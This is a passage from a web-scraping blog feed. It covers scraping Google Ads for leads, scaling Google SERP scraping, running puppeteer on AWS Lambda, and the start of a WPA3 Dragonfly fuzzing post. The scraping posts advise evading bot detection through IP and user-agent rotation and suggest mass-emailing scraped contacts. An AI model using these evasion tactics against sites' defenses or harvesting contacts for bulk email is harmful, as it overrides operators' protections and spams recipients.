    <span class="s2">"invocation_type"</span><span class="p">:</span> <span class="s2">"request_response"</span><span class="p">,</span>
    <span class="s2">"worker_type"</span><span class="p">:</span> <span class="s2">"http"</span><span class="p">,</span>
    <span class="s2">"function"</span><span class="p">:</span> <span class="s2">"https://raw.githubusercontent.com/NikolaiT/scrapeulous/master/leads.js"</span><span class="p">,</span>
    <span class="s2">"items"</span><span class="p">:</span> <span class="n">ad_links</span><span class="p">,</span>
    <span class="s2">"region"</span><span class="p">:</span> <span class="s2">"de"</span>
<span class="p">}</span>
<span class="n">headers</span> <span class="o">=</span> <span class="p">{</span>
    <span class="s1">'X-Api-Key'</span><span class="p">:</span> <span class="s1">''</span>
<span class="p">}</span>
<span class="n">r</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">post</span><span class="p">(</span><span class="n">url</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="n">json</span><span class="o">.</span><span class="n">dumps</span><span class="p">(</span><span class="n">payload</span><span class="p">),</span> <span class="n">headers</span><span class="o">=</span><span class="n">headers</span><span class="p">)</span>
<span class="n">data</span> <span class="o">=</span> <span class="n">r</span><span class="o">.</span><span class="n">json</span><span class="p">()</span>
<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s1">'leads.json'</span><span class="p">,</span> <span class="s1">'w'</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
    <span class="n">json</span><span class="o">.</span><span class="n">dump</span><span class="p">(</span><span class="n">data</span><span class="p">,</span> <span class="n">f</span><span class="p">)</span>
</code></pre></div>
<p>The above code will produce the following <a href="https://incolumitas.com/data/leads.json">lead contact information results</a>. Surely they are not perfect, but if this process is repeated with more keywords and run every six hours with a cronjob, you will end up with a large amount of lead contact information to which you can send automated emails that include your detailed offer of referring law clients.</p>
<h2>Conclusion</h2>
<p>In this blog post, an example scenario was used to show how it is possible to connect existing demand with supply and make money by bringing together service providers with new clients. Scraping Google Ads is an efficient method to locate service providers that are actively offering supply.</p>
<p>This strategy can be applied to any other industry where you control the demand.</p>Scraping 1 million keywords on the Google Search Engine2019-09-17T23:30:00+02:002019-09-17T23:30:00+02:00Nikolai Tschachertag:incolumitas.com,2019-09-17:/2019/09/17/scraping-one-million-google-serps/<p>Scraping one million keywords is not an easy task. There are proxy problems, big data problems and reliability issues. In this blog post, the most valuable insights are shared.</p><p>This blog post is not a practical guide on how to scrape one million keywords on Google. It rather presents a collection of thoughts on technical issues that have been encountered during the journey of scraping 1 million SERPs on Google. Different possible scraping architectures and methodologies are discussed as well.</p>
<h2>Problems encountered when scraping 1 million Google SERPs</h2>
<h3>The big data problem</h3>
<p>Launching millions of HTTP requests immediately creates a bunch of different issues. There is the problem of the <strong>size of the crawled data</strong>. Assuming that one request produces 50 kilobytes of data, one million requests add up to 50GB of crawled data. It is annoying to store such amounts of data on the central production server (especially when processing several scrape jobs of this size), therefore it makes sense to store it in the cloud on <a href="https://cloud.google.com/storage/docs/storage-classes">Nearline Storage</a>. AWS S3 or GCP Storage are examples of cloud storage services. The costs to store 50GB of data are negligible, it won't cost you more than a few cents.</p>
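<p>The size estimate is easy to reproduce and to adapt to other job sizes. The snippet below is just back-of-the-envelope arithmetic: the 50 kilobytes per response is the assumption from the text, decimal units are used (1 GB = 1,000,000 KB), and the function name <code>estimate_storage_gb</code> is made up.</p>

```python
def estimate_storage_gb(num_requests, kb_per_response):
    """Estimate the total size of the crawled data in gigabytes."""
    total_kb = num_requests * kb_per_response
    return total_kb / 1_000_000  # decimal units: 1 GB = 1,000,000 KB


one_job_gb = estimate_storage_gb(1_000_000, 50)
three_jobs_gb = 3 * one_job_gb
print(one_job_gb)     # 50.0
print(three_jobs_gb)  # 150.0
```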
<figure>
<img src="https://sloanreview.mit.edu/content/uploads/2016/11/MAG-FR-Chai-Big-Data-1200x627.jpg" alt="big data" style="width: 100%" />
<figcaption>Scraping produces a lot of data (Source: https://sloanreview.mit.edu/article/why-big-data-isnt-enough/) </figcaption>
</figure>
<h3>The proxy problem</h3>
<p>Another major problem is getting blocked by Google when repeatedly using the same IP address for the scraping process. Therefore, the ambitious scraping apprentice needs to either rent different cloud computing resources or subscribe to a proxy provider such as <a href="https://luminati.io/">luminati.io</a> or <a href="https://intoli.com/">intoli.com</a>. Web scraping is a <strong>dirty business</strong>. When you subscribe to a proxy service, you never know <a href="https://proxyway.com/guides/best-proxy-providers-for-amazon">how <em>clean</em> the proxies actually are</a>. Furthermore, using HTTP or SOCKS proxies usually increases the RTT and latency, both factors that the mighty Google search engine considers when classifying the likelihood of the client being an annoying automated scraping process.</p>
<p>A viable alternative to using a proxy provider is renting cloud computing instances. You could run your <a href="https://incolumitas.com/2019/08/31/web-scraping-puppeteer-aws-lambda/#web-scraping-puppeteer-aws-lambda">scraping logic on Amazon AWS</a> or on GCP Functions. Back in June 2018, I tested how many keywords you can actually scrape with one IP address and a headless Chrome browser controlled with <a href="https://github.com/GoogleChrome/puppeteer">puppeteer</a> before getting blocked. This usually depends on many different factors. I tested different combinations of the following variables:</p>
<ol>
<li>Randomly sleeping between requests</li>
<li><a href="https://www.npmjs.com/package/user-agents">Changing user agents</a> between requests</li>
<li>Different levels of concurrency (With incognito chrome browser windows)</li>
<li>Blocking certain media requests or image loading requests</li>
</ol>
<p>It turned out that the best combination of the above variables (and a couple more) gave us up to <strong>2806</strong> successful requests with a single datacenter IP address from a well known cloud provider before Google blocked us. The average number of successful requests was usually between 1000 and 1500. This number would likely increase when a residential proxy is chosen.</p>
<p>I developed a <a href="https://github.com/NikolaiT/se-scraper">little library named se-scraper</a> that allows you to scrape search engines such as Google, Bing or Yandex. The library has convenient Docker support and runs on Ubuntu 18.04 and newer versions. Its main purpose is to scrape the most common search engines in a robust fashion. Therefore, the library ships with a lot of static tests for different Google/Bing SERP layouts.</p>
<p>One possible approach would be to create one large bucket on S3 that serves as data storage and to write a script that automatically spawns new cloud VPS instances via the cloud service API. Those VPS servers are billed by the hour and the price for 2GB RAM is around $0.015/hour on a common cloud service provider. Assuming that each such instance manages to scrape 500 keywords in one hour before getting blocked by Google, we need to rent 1,000,000 / 500 = 2000 VPS instances. At one hour per instance, this adds up to roughly 30 USD in infrastructure costs.</p>
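<p>The estimate above can be reproduced with a few lines of JavaScript. The function and parameter names are hypothetical, and the sketch assumes that every instance is used for exactly one billed hour and then discarded.</p>

```javascript
// Back-of-the-envelope cost estimate with the figures from the text.
function estimateScrapingCost({ totalKeywords, keywordsPerInstance, pricePerHourUsd, hoursPerInstance = 1 }) {
  // Every instance is assumed to be thrown away once it has been blocked.
  const instances = Math.ceil(totalKeywords / keywordsPerInstance);
  const costUsd = instances * hoursPerInstance * pricePerHourUsd;
  return { instances, costUsd };
}

const estimate = estimateScrapingCost({
  totalKeywords: 1000000,
  keywordsPerInstance: 500,
  pricePerHourUsd: 0.015,
});
console.log(`${estimate.instances} instances, about ${estimate.costUsd.toFixed(2)} USD`);
```

<p>Changing <code>keywordsPerInstance</code> shows how sensitive the bill is to the blocking threshold: with 1000 keywords per instance, the cost is cut in half.</p>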
<h3>The task queuing problem</h3>
<p>A central instance is required that keeps track of the keywords that have already been scraped. On <a href="https://scrapeulous.com/">scrapeulous.com</a>, a simple Python dictionary is used as a queue that is stored as a JSON file on disk and updated as soon as a scraping worker makes progress. Of course, Redis may also be used as in-memory storage for the queue (with <a href="https://redis.io/topics/persistence">persistence</a>). However, I don't see the necessity if the queue file is only updated a couple of thousand times. A modern SSD should manage that frequency without any hassle.</p>
<p>This central instance decides when and how a new scraping worker needs to be launched. The scraping worker accepts an array of keywords, attempts to scrape this array of keywords, uploads the results to the AWS S3 storage and notifies the central instance with the list of keywords that have been successfully scraped. The central instance updates the queue and schedules another worker. The central instance also decides how many parallel workers should make progress.</p>
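<p>A minimal sketch of such a file-backed queue is shown below. It is written in JavaScript for consistency with the rest of this blog and is not the code running on scrapeulous.com; the class name, the three states and the method names are assumptions made for illustration.</p>

```javascript
const fs = require('fs');
const os = require('os');
const path = require('path');

// Hypothetical keyword queue that is persisted as a JSON file.
// Every keyword is in one of the states 'pending', 'running' or 'done'.
class KeywordQueue {
  constructor(file, keywords = []) {
    this.file = file;
    if (fs.existsSync(file)) {
      // Resume from the state of a previous run.
      this.state = JSON.parse(fs.readFileSync(file, 'utf8'));
    } else {
      this.state = {};
      for (const kw of keywords) this.state[kw] = 'pending';
      this.save();
    }
  }

  save() {
    // Write to a temporary file and rename it afterwards, so that a
    // crash does not leave a half-written queue file behind.
    const tmp = this.file + '.tmp';
    fs.writeFileSync(tmp, JSON.stringify(this.state));
    fs.renameSync(tmp, this.file);
  }

  // Hand out up to `size` pending keywords to a new worker.
  nextBatch(size) {
    const batch = Object.keys(this.state)
      .filter((kw) => this.state[kw] === 'pending')
      .slice(0, size);
    for (const kw of batch) this.state[kw] = 'running';
    this.save();
    return batch;
  }

  // Called when a worker reports the keywords it scraped successfully.
  // Keywords of the batch that were not scraped become pending again.
  report(batch, scraped) {
    const ok = new Set(scraped);
    for (const kw of batch) this.state[kw] = ok.has(kw) ? 'done' : 'pending';
    this.save();
  }

  remaining() {
    return Object.values(this.state).filter((s) => s !== 'done').length;
  }
}

// Usage: three keywords, one worker that only manages to scrape one of two.
const dir = fs.mkdtempSync(path.join(os.tmpdir(), 'queue-'));
const queueFile = path.join(dir, 'queue.json');
const queue = new KeywordQueue(queueFile, ['a', 'b', 'c']);
const batch = queue.nextBatch(2);
queue.report(batch, [batch[0]]);
console.log(queue.remaining());
```

<p>Because failed keywords simply return to the pending state, a blocked worker costs nothing more than a retry by the next worker.</p>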
<h3>The noise problem</h3>
<p>Scraping is not really appreciated by many website maintainers. Therefore, the scraping infrastructure should not annoy the target website and should <strong>stay below the radar</strong>. Hence, the number of parallel scraping workers should be kept low and the scraping process should be distributed evenly over a time interval of at least 7 days in order to avoid large, suspicious traffic spikes. When one million keywords are scraped over 7 days, 5952 keywords need to be scraped per hour, or 1.65 keywords per second. This frequency should not be suspicious for a search engine as large as Google, which probably handles hundreds of thousands of requests per second.</p>
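<p>The required rate follows directly from the number of keywords and the length of the time interval. The small helper below (a hypothetical name) makes it easy to see what a longer or shorter interval would mean.</p>

```javascript
// Required scraping rate when the keywords are spread evenly over `days` days.
function requiredRate(totalKeywords, days) {
  const hours = days * 24;
  const perHour = totalKeywords / hours;
  return { perHour, perSecond: perHour / 3600 };
}

const rate = requiredRate(1000000, 7);
console.log(Math.floor(rate.perHour), rate.perSecond.toFixed(2));
```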
<figure>
<img src="https://internet-governance-radar.de/assets/images/radar_2.jpg" alt="stay under the radar" style="width: 100%" />
<figcaption>The distributed scraping should stay under the radar (Source: https://internet-governance-radar.de) </figcaption>
</figure>
<h3>Conclusion</h3>
<p>By scraping one million keywords, a few important things have been learned:</p>
<ol>
<li>Absolutely use a <strong>queue-based approach</strong>, otherwise things get complicated quickly and a lot of time is lost trying to figure out which keywords were already scraped.</li>
<li>All operations should be idempotent. This means that repeatedly executing the same operation does not destroy any results. In maths: If we have a function <code>f(x) = y</code>, then <code>f</code> is idempotent if <code>f(f(x)) = f(x) = y</code>.</li>
<li><strong>Do not piss off the scraped website</strong>. Therefore, distribute the scraping over a larger time interval in order to avoid excess traffic or even a DoS.</li>
<li><strong>Divide and Conquer</strong>: Use several scraping worker instances with distinct IP addresses from a cloud computing provider. Change the worker if the IP address is detected. Only use a cloud service provider that allows you to rent computing instances on an hourly basis.</li>
</ol>
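<p>To illustrate the idempotency point from the list above: if results are written under a key derived from the keyword, a worker that is restarted and scrapes the same keyword again does not create duplicates. The sketch uses an in-memory <code>Map</code> as a stand-in for the result storage; the function name is hypothetical.</p>

```javascript
// Hypothetical result store. In the setup described in this post the
// results would be objects in an S3 bucket, keyed by keyword.
function storeResult(store, keyword, urls) {
  // Keyed write: storing the same result twice leaves the store unchanged,
  // whereas appending to a list would create duplicates.
  store.set(keyword, urls);
  return store;
}

const store = new Map();
storeResult(store, 'weather berlin', ['https://example.com/a']);
storeResult(store, 'weather berlin', ['https://example.com/a']);
console.log(store.size);
```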
<p>If you also want to scrape 1 million keywords on any website, please contact us at <a href="https://scrapeulous.com/contact/">scrapeulous.com</a>.</p>Scraping with puppeteer and headless chrome deployed to AWS Lambda2019-08-31T22:30:00+02:002019-08-31T22:30:00+02:00Nikolai Tschachertag:incolumitas.com,2019-08-31:/2019/08/31/web-scraping-puppeteer-aws-lambda/<p>In this blog post, we demonstrate how a web scraping function is deployed to the AWS cloud with puppeteer and headless chrome.</p><p>One of the most pressing issues with web scraping/crawling is the part where you get detected and blocked from the website. When scraping is implemented with raw http requests, it is usually pretty straightforward to detect the scraper by delivering a piece of javascript, that when not executed with a modern javascript engine, blocks all further access. There are a myriad of other strategies to distinguish bots from real human beings (Captchas, mouse movement, rendering functionality, ...). For those reasons, it is usually a smart idea to use a real browser such as headless chrome to accomplish web scraping projects.</p>
<p>This comes with the benefits of simplicity. It is much simpler to handle login functionality and complex browsing actions by programming a real web browser. The library to control headless chrome is called <a href="https://github.com/GoogleChrome/puppeteer">puppeteer</a>.</p>
<p>In this short blog post, it is demonstrated how a simple Google scraper can be deployed to the AWS cloud. All you need is some knowledge of JavaScript, an AWS account and one hour of your time. In the end, you will have a scraper that allows you to scrape any keywords on Google. The huge advantage of deploying the scraper to the cloud is that you can massively parallelize your crawling/scraping algorithms.</p>
<p>All code can be found in the <a href="https://github.com/NikolaiT/aws-scraper-example">respective GitHub repository</a>.</p>
<h2>Setting up the project</h2>
<p>The required JavaScript libraries are <code>user-agents</code>, <code>chrome-aws-lambda</code>, <code>aws-sdk</code> and <code>puppeteer-core</code>. You can install them with the <code>npm</code> package manager. Alternatively, you can clone the <a href="">following git repository</a>, where I have already set up everything. You also need to install the serverless package globally. You can <a href="https://serverless.com/framework/docs/providers/aws/guide/quick-start/">read the instructions on how to do so here</a>.</p>
<p>After you have cloned the repository with the command <code>git clone git@github.com:NikolaiT/aws-scraper-example.git</code>, it is time to set up your AWS credentials. Enter them into the file <code>.env</code>. The <code>.env</code> file has the following boilerplate structure:</p>
<div class="highlight"><pre><span></span><code>export AWS_ACCESS_KEY=
export AWS_SECRET_KEY=
export AWS_REGION=us-east-1
export AWS_PROFILE=
export AWS_FUNCTION_URN=
</code></pre></div>
<p>You need to enter the access key and secret key credentials that you received when you created your AWS account. After that, you are all set to deploy the scraper to the AWS Lambda cloud:</p>
<div class="highlight"><pre><span></span><code><span class="nb">source</span> .env
serverless deploy
</code></pre></div>
<p>After a successful deployment, <code>serverless</code> outputs a message such as the following:</p>
<div class="highlight"><pre><span></span><code>$ serverless deploy
Serverless: Packaging service...
Serverless: Excluding development dependencies...
Serverless: Creating Stack...
Serverless: Checking Stack create progress...
.....
Serverless: Stack create finished...
Serverless: Uploading CloudFormation file to S3...
Serverless: Uploading artifacts...
Serverless: Uploading service google-aws-scraper.zip file to S3 <span class="o">(</span><span class="m">39</span>.4 MB<span class="o">)</span>...
Serverless: Validating template...
Serverless: Updating Stack...
Serverless: Checking Stack update progress...
...............
Serverless: Stack update finished...
Service Information
service: google-aws-scraper
stage: dev
region: us-east-1
stack: google-aws-scraper-dev
resources: <span class="m">5</span>
api keys:
None
endpoints:
None
functions:
google-aws-scraper: google-aws-scraper-dev-google-aws-scraper
layers:
None
Serverless: Run the <span class="s2">"serverless"</span> <span class="nb">command</span> to setup monitoring, troubleshooting and testing
</code></pre></div>
<p>Now you need to update the <code>.env</code> file with the correct function name of your deployed scraper. You can look up the function name in the AWS console in the Lambda tab of the correct region.</p>
<h2>Testing the cloud scraper</h2>
<p>After the successful Lambda function deployment, we can test whether it is possible to search Google with our headless Chrome function living in the AWS cloud. For this task, we create a <code>test.js</code> script that invokes the AWS function. The test script has the following contents:</p>
<div class="highlight"><pre><span></span><code><span class="kd">var</span> <span class="nx">AWS</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'aws-sdk'</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">fs</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'fs'</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">invokeLambda</span> <span class="o">=</span> <span class="p">(</span><span class="nx">lambda</span><span class="p">,</span> <span class="nx">params</span><span class="p">)</span> <span class="p">=></span> <span class="ow">new</span> <span class="nb">Promise</span><span class="p">((</span><span class="nx">resolve</span><span class="p">,</span> <span class="nx">reject</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="nx">lambda</span><span class="p">.</span><span class="nx">invoke</span><span class="p">(</span><span class="nx">params</span><span class="p">,</span> <span class="p">(</span><span class="nx">error</span><span class="p">,</span> <span class="nx">data</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">error</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">reject</span><span class="p">(</span><span class="nx">error</span><span class="p">);</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="nx">resolve</span><span class="p">(</span><span class="nx">data</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">});</span>
<span class="p">});</span>
<span class="kd">const</span> <span class="nx">main</span> <span class="o">=</span> <span class="k">async</span> <span class="p">()</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">let</span> <span class="nx">region</span> <span class="o">=</span> <span class="nx">process</span><span class="p">.</span><span class="nx">env</span><span class="p">.</span><span class="nx">AWS_REGION</span><span class="p">;</span>
<span class="kd">let</span> <span class="nx">functionURN</span> <span class="o">=</span> <span class="nx">process</span><span class="p">.</span><span class="nx">env</span><span class="p">.</span><span class="nx">AWS_FUNCTION_URN</span><span class="p">;</span>
<span class="c1">// You shouldn't hard-code your keys in production!</span>
<span class="c1">// http://docs.aws.amazon.com/AWSJavaScriptSDK/guide/node-configuring.html</span>
<span class="nx">AWS</span><span class="p">.</span><span class="nx">config</span><span class="p">.</span><span class="nx">update</span><span class="p">({</span>
<span class="nx">accessKeyId</span><span class="o">:</span> <span class="nx">process</span><span class="p">.</span><span class="nx">env</span><span class="p">.</span><span class="nx">AWS_ACCESS_KEY</span><span class="p">,</span>
<span class="nx">secretAccessKey</span><span class="o">:</span> <span class="nx">process</span><span class="p">.</span><span class="nx">env</span><span class="p">.</span><span class="nx">AWS_SECRET_KEY</span><span class="p">,</span>
<span class="nx">region</span><span class="o">:</span> <span class="nx">region</span><span class="p">,</span>
<span class="p">});</span>
<span class="kd">const</span> <span class="nx">lambda</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">AWS</span><span class="p">.</span><span class="nx">Lambda</span><span class="p">();</span>
<span class="kd">let</span> <span class="nx">keywords</span> <span class="o">=</span> <span class="p">[</span><span class="s1">'weather berlin'</span><span class="p">,</span> <span class="s1">'news germany'</span><span class="p">,</span> <span class="s1">'what else'</span><span class="p">,</span> <span class="s1">'some keyword'</span><span class="p">];</span>
<span class="kd">let</span> <span class="nx">promises</span> <span class="o">=</span> <span class="p">[];</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">let</span> <span class="nx">kw</span> <span class="k">of</span> <span class="nx">keywords</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">let</span> <span class="nx">event</span> <span class="o">=</span> <span class="p">{</span> <span class="nx">keyword</span><span class="o">:</span> <span class="nx">kw</span> <span class="p">};</span>
<span class="kd">let</span> <span class="nx">params</span> <span class="o">=</span> <span class="p">{</span>
<span class="nx">FunctionName</span><span class="o">:</span> <span class="nx">functionURN</span><span class="p">,</span>
<span class="nx">InvocationType</span><span class="o">:</span> <span class="s2">"RequestResponse"</span><span class="p">,</span>
<span class="nx">Payload</span><span class="o">:</span> <span class="nb">JSON</span><span class="p">.</span><span class="nx">stringify</span><span class="p">(</span><span class="nx">event</span><span class="p">),</span>
<span class="p">};</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">params</span><span class="p">);</span>
<span class="nx">promises</span><span class="p">.</span><span class="nx">push</span><span class="p">(</span>
<span class="nx">invokeLambda</span><span class="p">(</span><span class="nx">lambda</span><span class="p">,</span> <span class="nx">params</span><span class="p">)</span>
<span class="p">)</span>
<span class="p">}</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="sb">`Invoked </span><span class="si">${</span><span class="nx">promises</span><span class="p">.</span><span class="nx">length</span><span class="si">}</span><span class="sb"> lambda requests!`</span><span class="p">);</span>
<span class="kd">var</span> <span class="nx">start</span> <span class="o">=</span> <span class="ow">new</span> <span class="nb">Date</span><span class="p">();</span>
<span class="kd">let</span> <span class="nx">results</span> <span class="o">=</span> <span class="k">await</span> <span class="nb">Promise</span><span class="p">.</span><span class="nx">all</span><span class="p">(</span><span class="nx">promises</span><span class="p">);</span>
<span class="kd">var</span> <span class="nx">end</span> <span class="o">=</span> <span class="ow">new</span> <span class="nb">Date</span><span class="p">()</span> <span class="o">-</span> <span class="nx">start</span><span class="p">;</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="sb">`invokeLambda() in region </span><span class="si">${</span><span class="nx">region</span><span class="si">}</span><span class="sb"> took </span><span class="si">${</span><span class="nx">end</span><span class="o">/</span><span class="mf">1000</span><span class="si">}</span><span class="sb"> seconds`</span><span class="p">);</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">let</span> <span class="nx">result</span> <span class="k">of</span> <span class="nx">results</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">let</span> <span class="nx">data</span> <span class="o">=</span> <span class="nx">result</span><span class="p">.</span><span class="nx">Payload</span><span class="p">;</span>
<span class="nx">data</span> <span class="o">=</span> <span class="nb">JSON</span><span class="p">.</span><span class="nx">parse</span><span class="p">(</span><span class="nx">data</span><span class="p">);</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">dir</span><span class="p">(</span><span class="nx">data</span><span class="p">,</span> <span class="p">{</span><span class="nx">depth</span><span class="o">:</span> <span class="kc">null</span><span class="p">,</span> <span class="nx">colors</span><span class="o">:</span> <span class="kc">true</span><span class="p">});</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="sb">`invokeLambda() in region </span><span class="si">${</span><span class="nx">region</span><span class="si">}</span><span class="sb"> took </span><span class="si">${</span><span class="nx">end</span> <span class="o">/</span> <span class="mf">1000</span><span class="si">}</span><span class="sb"> seconds`</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">};</span>
<span class="nx">main</span><span class="p">().</span><span class="k">catch</span><span class="p">(</span><span class="nx">error</span> <span class="p">=></span> <span class="nx">console</span><span class="p">.</span><span class="nx">error</span><span class="p">(</span><span class="nx">error</span><span class="p">));</span>
</code></pre></div>
<p>You first need to source the <code>.env</code> file with the correct parameters in order for the test script to work properly. After that, execute the test script and the four keywords will be searched on Google via the AWS Lambda cloud:</p>
<p><code>node test.js</code></p>
<p>This command should output four arrays of URLs obtained from the Google SERP.</p>
<h2>Conclusion</h2>
<p>In this tutorial we learned how to deploy a scraping function to the AWS Lambda cloud. One big advantage of the cloud is that you only pay for the computing time that your function needed. The free tier includes a large computing volume, such that you may develop whatever your scraping heart desires.</p>
<p>If you only want to focus on the scraping logic and don't want to deal with scalability issues, intelligent request retries and infrastructure problems, you can directly use the web scraper service on <a href="https://scrapeulous.com/">scrapeulous.com</a>. It comes with many practical examples of how to quickly create a scraper or crawler for any website on the Internet.</p>Fuzzing the WPA3 Dragonfly handshake2019-07-18T00:39:00+02:002019-07-19T17:37:00+02:00Nikolai Tschachertag:incolumitas.com,2019-07-18:/2019/07/18/fuzzing-the-wpa3-dragonfly-handshake-with-boofuzz/<p>Implementing possible fuzzing strategies with <strong>boofuzz</strong> against the WPA3 SAE Dragonfly handshake. Dragonfly is the main ingredient of WPA3 certified routers and 802.11 devices.</p><h2>Introduction</h2>
<p>In this blog post we learn how to perform a fuzzing test against an 802.11 authenticator (better known as an Access Point). We will use <a href="https://boofuzz.readthedocs.io/en/latest/">boofuzz</a>, the successor of the well-known Sulley fuzzing framework.</p>
<p>WPA3 is slowly emerging in the 802.11 modem and router industry. There aren't many devices yet, but production of WPA3 certified devices is expected to increase in the foreseeable future. This means that there will be an additional PAKE key exchange that is plugged in front of the old 4-way handshake, which is part of WPA and WPA2. This new handshake ensures two additional security properties:</p>
<ol>
<li><strong>Perfect forward secrecy</strong>: If a key is revealed, it cannot be used to decrypt past sessions.</li>
<li><strong>Offline dictionary attack resistance</strong>: When a passive observer records the handshake exchange, the collected material cannot be used to launch an offline dictionary attack against the handshake. With the WPA 4-way handshake, for example, a passive listener in the BSS can obtain key exchange data and launch an offline brute-force attack on Amazon Web Services with large computing resources.</li>
</ol>
<p>This <a href="https://tools.ietf.org/html/rfc7664">Dragonfly handshake</a> basically consists of two steps:</p>
<ol>
<li>Auth-Commit exchange: An online guess at the password is launched</li>
<li>Auth-Confirm exchange: Common knowledge of the password is confirmed</li>
</ol>
<p>Dragonfly is a password authenticated key exchange (PAKE). PAKE schemes essentially solve the asymmetric key distribution problem. The issue with public key cryptography is the difficulty of establishing trust. For this reason, a whole public key infrastructure based on certificates exists that essentially makes statements about who is who and who can be trusted.</p>
<p>Dragonfly is similar to the Diffie-Hellman key exchange. However, an important difference is that Dragonfly is authenticated. Diffie-Hellman is not authenticated, which is also the reason that attackers can launch a man-in-the-middle attack against it. The Dragonfly participants need to possess a low-entropy common secret (your wifi password) in order to exchange a secret key. The password, hashed together with the MAC addresses, is used to derive a group element in the elliptic curve group. This group element is then used as the starting point of a modified Diffie-Hellman key exchange. Without the correct password, an attacker cannot find the equivalent group element. Sounds complicated? Well, it is.</p>
<figure>
<img src="/images/sae-exchange.png" alt="overview of the SAE exchange"/>
<figcaption>Figure 1: The cryptographic overview of the Dragonfly handshake</figcaption>
</figure>
<h2>Why fuzzing?</h2>
<p>Fuzzing is a common technique to trigger memory corruption vulnerabilities by creating and sending malformed inputs to the software being tested. </p>
<p>In the years 2007 to 2009, Laurent Butti <a href="https://github.com/0xd012/wifuzzit">found many security vulnerabilities by using the predecessor of boofuzz, Sulley</a>. He mainly fuzzed 802.11 authentication and association management frames.</p>
<p>Not much has been done with fuzzing in 802.11 security research since then. For this reason, I launched another attempt, this time targeting the newly developed software for the WPA3 Dragonfly handshake.</p>
<p>Recently, the well-known researcher Mathy Vanhoef (KRACK attacks) published a couple of new security vulnerabilities in his <a href="https://wpa3.mathyvanhoef.com/">recent paper Dragonblood</a>. He mainly focuses on timing and cache-based side-channel attacks.</p>
<p>But why should we attempt to fuzz Dragonfly? After all, there are only two management frames exchanged in the authentication. There are a couple of reasons:</p>
<figure>
<img src="/images/commit-frame.png" alt="overview of the auth-commit frame"/>
<figcaption>Figure 2: An auth-commit frame has optional fields</figcaption>
</figure>
<h4>Anti Clogging Tokens</h4>
<p>Deriving the password element in the beginning of the Dragonfly handshake is a computationally costly operation. Therefore, the handshake is secured against DoS by a secret cookie that needs to be reflected when the AP sends it to the station. This cookie is essentially a SHA256 hash over the MAC addresses of the supplicant and a server secret. The anti-clogging token has no pre-defined length in the RFC. This means vendors have free choice there.</p>
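<p>The idea of such a stateless cookie can be sketched in a few lines of JavaScript. This is an illustration under assumptions, not the hostapd implementation: the function names are hypothetical, the MAC address is treated as a string, and HMAC-SHA256 keyed with the server secret is assumed as the way to combine secret and address.</p>

```javascript
const crypto = require('crypto');

// Hypothetical server secret; an access point would typically rotate it.
const serverSecret = crypto.randomBytes(32);

// Derive a stateless token from the supplicant MAC address.
// HMAC-SHA256 is an assumption of this sketch, not taken from the RFC.
function makeToken(secret, mac) {
  return crypto.createHmac('sha256', secret).update(mac.toLowerCase()).digest();
}

// Recompute the expected token and compare it in constant time.
function checkToken(secret, mac, token) {
  const expected = makeToken(secret, mac);
  if (token.length !== expected.length) return false;
  return crypto.timingSafeEqual(token, expected);
}

const token = makeToken(serverSecret, 'AA:BB:CC:DD:EE:FF');
console.log(token.length, checkToken(serverSecret, 'aa:bb:cc:dd:ee:ff', token));
```

<p>Because the token can be recomputed from the secret and the sender address, the access point does not need to keep any state until the token has been reflected. A fuzzer can target exactly this check, for example with truncated or oversized tokens.</p>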
<p>So if a supplicant sends an SAE auth-commit frame to the access point and the access point responds with an auth-commit frame with status <code>MMPDU_STATUS_CODE_ANTI_CLOGGING_TOKEN_REQ</code> set, the client has to reflect the cookie in a new auth-commit frame. This exchange may produce interesting fuzzing possibilities:</p>
<ol>
<li>What happens when the client sends an auth-commit frame with the reflected anti-clogging token but a different payload? A different group id? Or the same group id but a cryptographic payload for FFC instead of ECC?</li>
</ol>
<h4>Password Identifiers</h4>
<p>Dragonfly authentication frames may include a password identifier. Password identifiers are labels that are mapped to a certain password. They are used to tell the AP which password should be used for the authentication. The function below shows how password identifiers are recognized in <strong>hostapd 2.8</strong>. As the check shows, each password identifier element has a 3-byte header. A password identifier is located either after the scalar and element or after the scalar and element and a potential anti-clogging token. There is no real standardization of where the password identifier must be located.</p>
<div class="highlight"><pre><span></span><code><span class="k">static</span><span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="nf">sae_is_password_id_elem</span><span class="p">(</span><span class="k">const</span><span class="w"> </span><span class="n">u8</span><span class="w"> </span><span class="o">*</span><span class="n">pos</span><span class="p">,</span><span class="w"> </span><span class="k">const</span><span class="w"> </span><span class="n">u8</span><span class="w"> </span><span class="o">*</span><span class="n">end</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">end</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">pos</span><span class="w"> </span><span class="o">>=</span><span class="w"> </span><span class="mi">3</span><span class="w"> </span><span class="o">&&</span><span class="w"></span>
